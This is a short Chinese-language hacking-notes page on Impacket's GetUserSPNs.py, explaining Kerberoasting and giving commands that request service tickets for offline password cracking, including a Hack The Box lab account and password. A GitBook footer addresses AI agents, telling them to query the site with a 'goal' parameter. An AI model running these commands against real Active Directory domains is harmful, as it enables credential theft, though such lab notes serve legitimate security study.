> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/zh/ports-and-services/kerberos-88/getuserspns-tool.md).

# GetUserSPNs - 工具

### **GetUserSPNs.py**

> 此工具是 **Impacket** 套件的一部分，用于安全测试和 Active Directory 审计。它利用了 **Kerberoasting** 漏洞，该漏洞允许提取为配置了 SPN（服务主体名称）的账户的服务票据（TGS）。

示例：

```bash
GetUserSPNs.py domain.local/username:password
```

此命令可获取用于离线破解的票据授予服务（TGS）票据。

```bash
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18
```

添加 `-request` 参数：/ 此选项会直接下载 TGS 票据以便离线破解。

```bash
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
```

<figure><img src="/files/5cbf2e922194786fa654431b9a3011c1731dcef3" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/zh/ports-and-services/kerberos-88/getuserspns-tool.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
